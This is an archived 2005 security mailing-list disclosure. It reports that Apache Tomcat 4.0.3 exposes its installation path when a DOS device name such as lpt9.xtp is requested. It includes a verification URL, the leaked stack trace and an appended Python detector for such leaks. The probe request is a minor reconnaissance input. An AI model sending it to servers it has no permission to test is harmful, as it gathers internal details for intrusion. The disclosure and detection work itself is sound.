From: security curmudgeon
To: Steven Christey, Sullo of Nikto
Date: Thu, 13 Oct 2005 14:21:33 -0400 (EDT)
Subject: Apache Tomcat 4.0.3 MS-DOS Device Request Path Disclosure

Didn't see this in CVE or OSVDB.

There is a known issue with several web servers, including Resin, where requesting a file whose name matches an MS-DOS device name causes the server to error out. Such errors will sometimes include installation path information. While testing a few servers, the Nikto check for this triggered, but the server wasn't Resin.

Nikto check that triggered:

+ OSVDB-0: GET /lpt9.xtp : Resin 2.1 reveals the server path when a DOS device is requested.

Actual server:

+ Server: Apache Tomcat/4.0.3 (HTTP/1.1 Connector)

To verify:

http://[target]:5225/lpt9.xtp

Apache Tomcat/4.0.3 - HTTP Status 500 - Internal Server Error

type Exception report

message Internal Server Error

description The server encountered an internal error (Internal Server Error) that prevented it from fulfilling this request.

exception java.io.FileNotFoundException: C:\Program Files\Hewlett-Packard\Toolbox2.0\Apache Tomcat 4.0\webapps\ROOT\lpt9.xtp (The system cannot find the file specified)
    at java.io.FileInputStream.open(Native Method)
    at java.io.FileInputStream.(Unknown Source)
    at java.io.FileInputStream.(Unknown Source)
[..]
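To check your own servers for the behaviour described in this report, the following added example (not part of the original mail, and not Nikto's own check) classifies a request/response pair: it recognises the reserved DOS device names Windows treats specially, pulls any filesystem path out of a Tomcat FileNotFoundException line, and recovers the install root from it. The sample response body is constructed from the error page quoted above.

```python
import re
from typing import Optional

# Windows reserved device names. The OS ignores the extension, so a request for
# "lpt9.xtp" is resolved against the LPT9 device rather than a file on disk.
RESERVED_DEVICES = ({"CON", "PRN", "AUX", "NUL"}
                    | {f"COM{i}" for i in range(1, 10)}
                    | {f"LPT{i}" for i in range(1, 10)})

# Matches the path in a Tomcat stack-trace line of the form
#   java.io.FileNotFoundException: C:\...\lpt9.xtp (The system cannot find the file specified)
# The lazy match stops at the " (" before the OS message or at end of line.
FNF_PATH = re.compile(r"FileNotFoundException:\s+([A-Za-z]:\\.*?)(?=\s+\(|\s*$)",
                      re.MULTILINE)


def is_reserved_device_name(request_path: str) -> bool:
    """True if the last URL segment, minus any extension, is a DOS device name."""
    stem = request_path.rsplit("/", 1)[-1].split(".", 1)[0]
    return stem.upper() in RESERVED_DEVICES


def disclosed_paths(body: str) -> list:
    """Filesystem paths leaked in FileNotFoundException lines of an error page."""
    return sorted(set(FNF_PATH.findall(body)))


def tomcat_install_root(path: str) -> Optional[str]:
    """Strip '\\webapps\\<context>\\...' to recover the Tomcat install directory."""
    idx = path.lower().find("\\webapps\\")
    return path[:idx] if idx != -1 else None


def assess(request_path: str, status: int, body: str) -> dict:
    """Classify one request/response pair for DOS-device-name path disclosure."""
    paths = disclosed_paths(body)
    return {
        "reserved_name": is_reserved_device_name(request_path),
        "disclosed_paths": paths,
        "install_roots": sorted({r for r in map(tomcat_install_root, paths) if r}),
        "leaks_path": status == 500 and bool(paths),
    }


# Constructed sample: the Tomcat 4.0.3 error page quoted in the report.
SAMPLE_BODY = r"""Apache Tomcat/4.0.3 - HTTP Status 500 - Internal Server Error
exception java.io.FileNotFoundException: C:\Program Files\Hewlett-Packard\Toolbox2.0\Apache Tomcat 4.0\webapps\ROOT\lpt9.xtp (The system cannot find the file specified)
    at java.io.FileInputStream.open(Native Method)"""

if __name__ == "__main__":
    print(assess("/lpt9.xtp", 500, SAMPLE_BODY))
```

A server that is not affected answers such a request with a 404 (or a generic 500 page without a stack trace), so `leaks_path` stays False.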